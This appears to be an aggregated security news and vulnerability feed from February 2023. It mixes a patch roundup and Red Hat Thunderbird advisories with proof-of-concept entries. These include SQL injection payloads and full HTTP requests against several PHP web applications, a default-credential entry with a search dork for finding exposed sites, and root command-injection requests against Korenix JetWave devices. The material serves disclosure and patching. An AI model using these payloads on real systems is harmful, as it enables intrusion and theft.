Plus: Microsoft fixes several zero-day bugs, Google patches Chrome and Android, Mozilla rids Firefox of a full-screen vulnerability, and more.

February has been a big month for security updates, with the likes of Apple, Microsoft, and Google releasing patches to fix serious vulnerabilities. Meanwhile, a number of enterprise bugs have been squashed by firms that include VMware, SAP, and Citrix. 

The flaws fixed during the month include several that were being used in real-life attacks, so it’s worth checking that your software is up to date.

Here’s everything you need to know about the security updates released this month. 

Apple iOS and iPadOS 16.3.1

Just weeks after the release of iOS 16.3, Apple issued iOS and iPadOS 16.3.1—an emergency patch to fix vulnerabilities that included a flaw in the browser engine WebKit that was already being used in attacks.

Tracked as CVE-2023-23529, the already exploited bug could lead to arbitrary code execution, Apple warned on its support page. “Apple is aware of a report that this issue may have been actively exploited,” the firm added. Another flaw patched in iOS 16.3.1 is in the Kernel at the heart of the iPhone operating system. The bug, which is tracked as CVE-2023-23514, could allow an attacker to execute arbitrary code with Kernel privileges.

Later in the month, Apple documented another vulnerability fixed in iOS 16.3.1, CVE-2023-23524. Reported by David Benjamin, a software engineer at Google, the flaw could enable a denial of service attack via a maliciously crafted certificate.

Apple also released macOS Ventura 13.2.1, tvOS 16.3.2, and watchOS 9.3.1 during the month.

Microsoft 

In mid-February, Microsoft warned that its Patch Tuesday has fixed 76 security vulnerabilities, three of which are already being used in attacks. Seven of the flaws are marked as critical, according to Microsoft’s update guide.

Tracked as CVE-2023-21823, one of the most serious of the already exploited bugs in the Windows graphics component could allow an attacker to gain System privileges.

Another already exploited flaw, CVE-2023-21715, is a feature bypass issue in Microsoft Publisher, while CVE-2023-23376 is a privilege escalation vulnerability in Windows common log file system driver.

That’s a lot of zero-day flaws fixed in one release, so take it as a prompt to update your Microsoft-based systems as soon as possible.

Google Android 

Android’s February security update is here, fixing multiple vulnerabilities in devices running the tech giant’s smartphone software. The most severe of these issues is a security vulnerability in the Framework component that could lead to local escalation of privilege with no additional privileges needed, Google noted in an advisory. 

Among the issues fixed in the Framework, eight are rated as having a high impact. Meanwhile, Google has squashed six bugs in the Kernel, as well as flaws in the System, MediaTek, and Unisoc components.

During the month, Google patched multiple privilege escalation flaws, as well as information disclosure and denial of service vulnerabilities. The company also released a patch for three Pixel-specific security issues. The Android February patch is already available for Google’s Pixel devices, while Samsung has moved quickly to issue the update to users of its Galaxy Note 20 series.

Google Chrome 

Google has released Chrome 110 for its browser, fixing 15 security vulnerabilities, three of which are rated as having a high impact. Tracked as CVE-2023-0696, the first of these is a type confusion bug in the V8 JavaScript engine, Google wrote in a security advisory. 

Meanwhile, CVE-2023-0697 is a flaw that allows inappropriate implementation in full-screen mode, and CVE-2023-0698 is an out-of-bounds read flaw in WebRTC. Four medium-severity vulnerabilities include a use after free in GPU, a heap buffer overflow flaw in WebUI, and a type confusion vulnerability in Data Transfer. Two further flaws are rated as having a low impact.

Apple Users Need to Update iOS Now to Patch Serious Flaws

SQL injection vulnerability in sourcecodester mobile-shop-system-php-mysql 1.0 allows remote attackers to log in via crafterdstring in the email field of the log in page.

    # Title: Mobile Shop System v1.0 - SQLi lead to authentication bypass# Exploit Author: Moaaz Taha (0xStorm)# Date: 2020-09-08# Vendor Homepage: https://www.sourcecodester.com/php/14412/mobile-shop-system-php-mysql.html# Software Link: https://www.sourcecodester.com/download-code?nid=14412&title=Mobile+Shop+System+in+PHP+MySQL# Version: 1.0# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4# POC1- Go to "http://TARGET/mobileshop-master/login.php" or "http://TARGET/mobileshop-master/LoginAsAdmin.php"2- Inject this SQL payload (test' or 1=1 -- -) in email field and any password in password field.3- Click on "login", then you will bypass the authentication successfully.# Malicious HTTP POST RequestsPOST /mobileshop-master/login.php HTTP/1.1Host: 192.168.1.55:8888User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://192.168.1.55:8888/mobileshop-master/login.phpContent-Type: application/x-www-form-urlencodedContent-Length: 44Connection: closeUpgrade-Insecure-Requests: 1email=test%27+or+1%3D1+--+-&password=test123==========================================================================POST /mobileshop-master/LoginAsAdmin.php HTTP/1.1Host: 192.168.1.55:8888User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://192.168.1.55:8888/mobileshop-master/LoginAsAdmin.phpContent-Type: application/x-www-form-urlencodedContent-Length: 44Connection: closeCookie: PHPSESSID=d7c49f6634a208dca0624f2f6b1d27b6Upgrade-Insecure-Requests: 1email=test%27+or+1%3D1+--+-&password=test123

CVE-2021-34248: Mobile Shop System 1.0 SQL Injection ≈ Packet Storm

Kshitish Multipurpose eCommerce Platform version 2.0 leaves default administrative credentials installed post installation.

    ====================================================================================================================================| # Title     : kshitish v2.0 Multipurpose eCommerce Platform Insecure Settings Vulnerability                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(64-bit)                                              | | # Vendor    : https://www.yahoobaba.net/                                                                                         |  | # Dork      : "Created by YahooBaba"                                                                                             |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password  [+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin  & pass=admin [+] http://127.0.0.1-stor.com/admin/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Kshitish 2.0 Default Credentials

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Feb. 17 and Feb. 24. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed...

Threat Round up for February 17 to February 24

Korenix JetWave 4200 Series 1.3.0 and JetWave 3200 Series 1.6.0 are vulnerable to Denial of Service via /goform/formDefault.

**Title**: Multiple Vulnerabilities  
**Product**: JetWave4221 HP-E, JetWave 2212G, JetWave 2212X/2212S, JetWave 2211C, JetWave 2411/2111, JetWave 2411L/2111L, JetWave 2414/2114, JetWave 2424, JetWave 2460, JetWave 3220/3420 V3  
**Vulnerable version**: See “Vulnerable Versions”  
**Fixed version**: See “Solution”  
**CVE**: CVE-2023-23294, CVE-2023-23295, CVE-2023-23296  
**Impact**: High  
**Homepage**: https://korenix.com  
**Found**: 2022-11-28

_Multiple JetWave products from Korenix are prone to command injection and denial of service (DoS) vulnerabilities._

**Vendor description**

“Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions.  
\[…\]  
Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, andTransportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, system integrators, and brand label partners.”

Source:  
https://www.korenix.com/en/about/index.aspx?kind=3

**Vulnerable versions**

The following firmware versions have been found to be vulnerable by CyberDanube:

*   Korenix JetWave4221 HP-E <= V1.3.0
*   Korenix JetWave 3220/3420 V3 < V1.7

The following firmware versions have been identified to be vulnerable by the vendor:

*   Korenix JetWave 2212G V1.3.T
*   Korenix JetWave 2212X/2112S V1.3.0
*   Korenix JetWave 2211C < V1.6
*   Korenix JetWave 2411/2111 < V1.5
*   Korenix JetWave 2411L/2111L < V1.6
*   Korenix JetWave 2414/2114 < V1.4
*   Korenix JetWave 2424 < V1.3
*   Korenix JetWave 2460 < V1.6

**Vulnerability overview**

1) Authenticated Command Injection (CVE-2023-23294, CVE-2023-23295)  
The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, or controls various critical equipment via serial ports, more extensive damage in the corresponding network can be done by an attacker.

2) Authenticated Denial of Web-Service (CVE-2023-23296)  
When logged in, a user can issue a POST request such that the underlying binary exits. The Web-Service becomes unavailable and cannot be accessed until the device gets rebooted.

**Proof of Concept****1) Authenticated Command Injection**

1.a) – CVE-2023-23294  
The command “touch /tmp/poc” was injected to the system by using the following  
POST request:

POST /goform/formTFTPLoadSave HTTP/1.1  
Host: 172.16.0.38  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 127  
Origin: http://172.16.0.38  
Connection: close  
Referer: http://172.16.0.38/mgmtsaveconf.asp  
Cookie: -common-web-session-=::webs.session::d7af70f81033cff3828902e476ceda45  
Upgrade-Insecure-Requests: 1

submit-url=%2Fmgmtsaveconf.asp&ip\_address=192.168.1.1&file\_name=%24%28touch+%2Ftmp%2Fpoc%29&tftp\_action=load&tftp\_config=Submit

The command gets executed as root and a file under the folder /tmp/ is created.

1.b) – CVE-2023-23295  
The command “touch /tmp/poc2” was injected to the system by using the following POST request:

POST /goform/formSysCmd HTTP/1.1  
Host: 172.16.0.38  
Content-Type: application/x-www-form-urlencoded  
Connection: close  
Referer: 172.16.0.38  
Cookie: -common-web-session-=::webs.session::df1307d508d798638a8b4572987462bb  
Content-Length: 40

sysCmd=touch%20/tmp/poc2&submit-url=

The command gets executed as root and a file under the folder /tmp/ is created. Command output is written into /tmp/syscmd.

**2) Authenticated Denial of Web-Service (CVE-2023-23296)**

The process goahead chrashes when the following POST request is sent to the endpoint /goform/formDefault:

POST /goform/formDefault HTTP/1.1  
Host: 172.16.0.38  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 62  
Origin: http://172.16.0.38  
Connection: close  
Referer: http://172.16.0.38/toolping.asp  
Cookie: -common-web-session-=::webs.session::3c624961199904f380e978a3967cc356  
Upgrade-Insecure-Requests: 1

PingIPAddress=127.0.0.1&submit-url=%2Ftoolping.asp&Submit=Ping

The output was observed on the terminal using our emulated instance:

rm: invalid option — /  
BusyBox v1.01 (2022.10.21-00:22+0000) multi-call binary  
Usage: rm \[OPTION\]… FILE…

Remove (unlink) the FILE(s). You may use ‘–‘ to  
indicate that all following arguments are non-options.

Options:  
\-i always prompt before removing each destination  
\-f remove existing destinations, never prompt  
\-r or -R remove the contents of directories recursively

killall: wlwatchdog: no process killed  
killall: wlapwatchdog: no process killed

The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

**Solution**

Owner of these products are suggested to update to the following versions:

*   Korenix JetWave 4221 HP-E V1.4.0
*   Korenix JetWave 2212G V1.10
*   Korenix JetWave 2212X/2112S V1.11
*   Korenix JetWave 2211C V1.6
*   Korenix JetWave 2411/2111 V1.5
*   Korenix JetWave 2411L/2111L V1.6
*   Korenix JetWave 2414/2114 V1.4
*   Korenix JetWave 2424 V1.3
*   Korenix JetWave 2460 V1.6
*   Korenix JetWave 3220/3420 V3 V1.7

**Workaround****Recommendation**

CyberDanube recommends customers from Korenix to upgrade the firmware to the latest version available. Furthermore, a full security review by professionals is recommended.

**Contact Timeline**

*   2022-12-05: Contacting Beijer Electronics Group via
*   2022-12-12: Meeting with Beijer Electronics. Vulnerabilities were confirmed by the vendor. The vendor planned to fix the vulnerabilities in the next 1.5 months.
*   2023-01-04: Contact shared the updated firmware version. CyberDanube checked if the vulnerabilities got fixed. The contact communicated that  
    not only JetWave4221 is vulnerable to these issues. Therefore, CyberDanube postponed the release of the Advisory until the other  
    products have been patched.
*   2023-01-30: Meeting with Beijer Electronics. Customer get informed about the issues. Fixes got published. Disclosure date got shifted to 2023-02-13 to provide a time-window for patching.
*   2023-02-13: Coordinated release of security advisory.

**Author**

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on digital twins, information security risk assessment and firmware analysis. Currently, he is working on developing the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the “Austrian Cyber Security Challenge”, where he has won in his category with an impressive number of points.

CVE-2023-23296: [EN] Multiple Vulnerabilities in Korenix JetWave Series - CyberDanube

Yoga Class Registration System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    # Exploit Title: Authenticated POST based SQL Injection when delete user on Yoga Class Registration System# Google Dork: NA# Date: 23/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html# Software Link: [download link if available]# Version: 1.0# CVE: [CVE-2023-0982]# Tested on: Windows 11# PayloadGET /php-ycrs/admin/registrations/update_status.php?id=2'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjU HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/110.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestConnection: closeReferer:http://localhost/php-ycrs/admin/?page=registrations/view_registration&id=2Cookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhgSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin##Payload'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjUthe back-end DBMS is MySQLweb application technology: PHP 8.0.25, Apache 2.4.54back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)# Exploit Title: Authenticated POST based SQL Injection when delete user on Yoga Class Registration System# Google Dork: NA# Date: 23/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html# Software Link: [download link if available]# Version: 1.0# CVE: ( CVE-2023-0981 )# Tested on: Windows 11```POST /php-ycrs/classes/Master.php?f=delete_class HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/110.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 6Origin: http://localhostConnection: closeReferer: http://localhost/php-ycrs/admin/?page=classesCookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhgSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originid=96'```# PayloadParameter: id (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery -comment)    Payload: id=96' AND 2307=(SELECT (CASE WHEN (2307=2307) THEN 2307 ELSE(SELECT 8487 UNION SELECT 3172) END))-- -    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR)    Payload: id=96' AND (SELECT 4409 FROM(SELECTCOUNT(*),CONCAT(0x7162707671,(SELECT(ELT(4409=4409,1))),0x71716b6b71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NiQL    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=96' AND (SELECT 9070 FROM (SELECT(SLEEP(5)))jayu)-- wkzQ# Exploit Title: Authenticated POST based SQL Injection when add class on Yoga Class Registration System# Google Dork: NA# Date: 23/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html# Software Link: [download link if available]# Version: 1.0# CVE: ( CVE-2023-0982 )# Tested on: Windows 11##PayloadPOST /php-ycrs/classes/Master.php?f=save_registration HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/110.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data;boundary=---------------------------408548517113152447833471217322Content-Length: 286Origin: http://localhostConnection: closeReferer:http://localhost/php-ycrs/admin/?page=registrations/view_registration&id=2Cookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhgSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------408548517113152447833471217322Content-Disposition: form-data; name="id"2'-----------------------------408548517113152447833471217322Content-Disposition: form-data; name="status"1-----------------------------408548517113152447833471217322--##Payload'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjUthe back-end DBMS is MySQLweb application technology: PHP 8.0.25, Apache 2.4.54back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)

Yoga Class Registration System 1.0 SQL Injection

ThingsBoard 3.4.1 could allow a remote attacker to gain elevated privileges because hard-coded service credentials (usable for privilege escalation) are stored in an insecure format. (To read this stored data, the attacker needs access to the application server or its source code.)

CVE-2023-26462: ThingsBoard Release Notes

Sales Tracker System version 1.0 suffers from an authenticated remote SQL injection vulnerability.

    # Exploit Title: Authenticated SQL Injection on Sales Tracker System# Google Dork: NA# Date: 21/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage:https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html# Software Link: [download link if available]# Version: 1.0# Tested on: Windows 11```GET /php-sts/admin/products/view_product.php?id=5' HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/110.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestConnection: closeReferer: http://localhost/php-sts/admin/?page=productsCookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhgSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin```# PayloadParameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=5' AND 3888=3888-- vxtB    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: id=5' OR (SELECT 7013 FROM(SELECTCOUNT(*),CONCAT(0x7162767671,(SELECT(ELT(7013=7013,1))),0x7170717671,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ikkJ    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=5' AND (SELECT 2482 FROM (SELECT(SLEEP(5)))dHEy)-- ehsZ---[15:47:48] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.4.54, PHP 8.0.25back-end DBMS: MySQL >= 5.0 (MariaDB fork)

Sales Tracker System 1.0 SQL Injection

Red Hat Security Advisory 2023-0817-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.8.0. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:0817-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0817  
Issue date:        2023-02-20  
CVE Names:         CVE-2023-0616 CVE-2023-0767 CVE-2023-25728  
                   CVE-2023-25729 CVE-2023-25730 CVE-2023-25732  
                   CVE-2023-25735 CVE-2023-25737 CVE-2023-25739  
                   CVE-2023-25742 CVE-2023-25743 CVE-2023-25744  
                   CVE-2023-25746  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64le, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.8.0.

Security Fix(es):

* Mozilla: Arbitrary memory write via PKCS 12 in NSS (CVE-2023-0767)

* Mozilla: Content security policy leak in violation reports using iframes  
(CVE-2023-25728)

* Mozilla: Screen hijack via browser fullscreen mode (CVE-2023-25730)

* Mozilla: Potential use-after-free from compartment mismatch in  
SpiderMonkey (CVE-2023-25735)

* Mozilla: Invalid downcast in SVGUtils::SetupStrokeGeometry  
(CVE-2023-25737)

* Mozilla: Use-after-free in  
mozilla::dom::ScriptLoadContext::~ScriptLoadContext (CVE-2023-25739)

* Mozilla: Fullscreen notification not shown in Firefox Focus  
(CVE-2023-25743)

* Mozilla: Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8  
(CVE-2023-25744)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.8 (CVE-2023-25746)

* Mozilla: Extensions could have opened external schemes without user  
knowledge (CVE-2023-25729)

* Mozilla: Out of bounds memory write from EncodeInputStream  
(CVE-2023-25732)

* Mozilla: User Interface lockup with messages combining S/MIME and OpenPGP  
(CVE-2023-0616)

* Mozilla: Web Crypto ImportKey crashes tab (CVE-2023-25742)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2170374 - CVE-2023-25728 Mozilla: Content security policy leak in violation reports using iframes  
2170375 - CVE-2023-25730 Mozilla: Screen hijack via browser fullscreen mode  
2170376 - CVE-2023-25743 Mozilla: Fullscreen notification not shown in Firefox Focus  
2170377 - CVE-2023-0767 Mozilla: Arbitrary memory write via PKCS 12 in NSS  
2170378 - CVE-2023-25735 Mozilla: Potential use-after-free from compartment mismatch in SpiderMonkey  
2170379 - CVE-2023-25737 Mozilla: Invalid downcast in SVGUtils::SetupStrokeGeometry  
2170381 - CVE-2023-25739 Mozilla: Use-after-free in mozilla::dom::ScriptLoadContext::~ScriptLoadContext  
2170382 - CVE-2023-25729 Mozilla: Extensions could have opened external schemes without user knowledge  
2170383 - CVE-2023-25732 Mozilla: Out of bounds memory write from EncodeInputStream  
2170390 - CVE-2023-25742 Mozilla: Web Crypto ImportKey crashes tab  
2170391 - CVE-2023-25744 Mozilla: Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8  
2170402 - CVE-2023-25746 Mozilla: Memory safety bugs fixed in Firefox ESR 102.8  
2171397 - CVE-2023-0616 Mozilla: User Interface lockup with messages combining S/MIME and OpenPGP

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
thunderbird-102.8.0-2.el7_9.src.rpm

x86_64:  
thunderbird-102.8.0-2.el7_9.x86_64.rpm  
thunderbird-debuginfo-102.8.0-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

Source:  
thunderbird-102.8.0-2.el7_9.src.rpm

ppc64le:  
thunderbird-102.8.0-2.el7_9.ppc64le.rpm  
thunderbird-debuginfo-102.8.0-2.el7_9.ppc64le.rpm

x86_64:  
thunderbird-102.8.0-2.el7_9.x86_64.rpm  
thunderbird-debuginfo-102.8.0-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
thunderbird-102.8.0-2.el7_9.src.rpm

x86_64:  
thunderbird-102.8.0-2.el7_9.x86_64.rpm  
thunderbird-debuginfo-102.8.0-2.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0616  
https://access.redhat.com/security/cve/CVE-2023-0767  
https://access.redhat.com/security/cve/CVE-2023-25728  
https://access.redhat.com/security/cve/CVE-2023-25729  
https://access.redhat.com/security/cve/CVE-2023-25730  
https://access.redhat.com/security/cve/CVE-2023-25732  
https://access.redhat.com/security/cve/CVE-2023-25735  
https://access.redhat.com/security/cve/CVE-2023-25737  
https://access.redhat.com/security/cve/CVE-2023-25739  
https://access.redhat.com/security/cve/CVE-2023-25742  
https://access.redhat.com/security/cve/CVE-2023-25743  
https://access.redhat.com/security/cve/CVE-2023-25744  
https://access.redhat.com/security/cve/CVE-2023-25746  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/O78NzjgjWX9erEAQgLIQ/6AonOdpr7h94n5PRY3uGt6HwXlQIFKfHx  
BVL9Z/hzFW2Rir6GIDpSCXrKxCKSvTe9TCajYUv6a5PH5qEq0Ur3vRzawXDKm6I+  
Vk1DJIF82svSe3SI9xk0oLScagYIrGor/eNKO+kDw4iD9gVtXCl9EZfHpLvSJ+Ul  
HtqDLoo9Ns0M8pYiIFKxGPW1q+3yudeR1Yv2ZwBlDAkDDFJZgOyoNNO0JXNX4wg2  
yWFyTkogdwkhruFZZP52w2inqRnzeH4/OCqPrZE3Wf1IWtxgtgA/NJKVnTI+anKl  
m2Ly/tvgpOMXSMfGyVL2Vs4kegPi78t9LEXAG5TDUa0tk+7qqZmvifq78oXWgbPW  
yBtJyydTKcd4IQO/t9WlUmHKx4WnIzvrFqDnnYfv4lcTR5vxPUUrvw+LuWv7KSNG  
gOvw7tRfmVMR0TpxF9zzUeKO5F1syyT2Ao2YopWqUYNoT62mQkWTxVi91fybqcmk  
uZByqwwAlWkXgPAiSSm24m92AncwBTWnSqLOx4sk+sKthkhVnpnxcsJIQXxxoZXZ  
x2qmAA+SyAorZofZga3RGWXw0fqqWYX7YB33xc47uUGTkYRIlqBvp83wsd3YxgMG  
X8/EE5po5UWM2ZzZ62HVqUc0Y4bk+Ko/kLFDqVPxUjMYVU7inGjMhEwlyEdnd8yj  
C3OvNTrjD7Y=TSFg  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0817-01

Red Hat Security Advisory 2023-0824-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.8.0. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:0824-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0824  
Issue date:        2023-02-20  
CVE Names:         CVE-2023-0616 CVE-2023-0767 CVE-2023-25728  
                   CVE-2023-25729 CVE-2023-25730 CVE-2023-25732  
                   CVE-2023-25735 CVE-2023-25737 CVE-2023-25739  
                   CVE-2023-25742 CVE-2023-25743 CVE-2023-25744  
                   CVE-2023-25746  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.8.0.

Security Fix(es):

* Mozilla: Arbitrary memory write via PKCS 12 in NSS (CVE-2023-0767)

* Mozilla: Content security policy leak in violation reports using iframes  
(CVE-2023-25728)

* Mozilla: Screen hijack via browser fullscreen mode (CVE-2023-25730)

* Mozilla: Potential use-after-free from compartment mismatch in  
SpiderMonkey (CVE-2023-25735)

* Mozilla: Invalid downcast in SVGUtils::SetupStrokeGeometry  
(CVE-2023-25737)

* Mozilla: Use-after-free in  
mozilla::dom::ScriptLoadContext::~ScriptLoadContext (CVE-2023-25739)

* Mozilla: Fullscreen notification not shown in Firefox Focus  
(CVE-2023-25743)

* Mozilla: Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8  
(CVE-2023-25744)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.8 (CVE-2023-25746)

* Mozilla: Extensions could have opened external schemes without user  
knowledge (CVE-2023-25729)

* Mozilla: Out of bounds memory write from EncodeInputStream  
(CVE-2023-25732)

* Mozilla: User Interface lockup with messages combining S/MIME and OpenPGP  
(CVE-2023-0616)

* Mozilla: Web Crypto ImportKey crashes tab (CVE-2023-25742)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

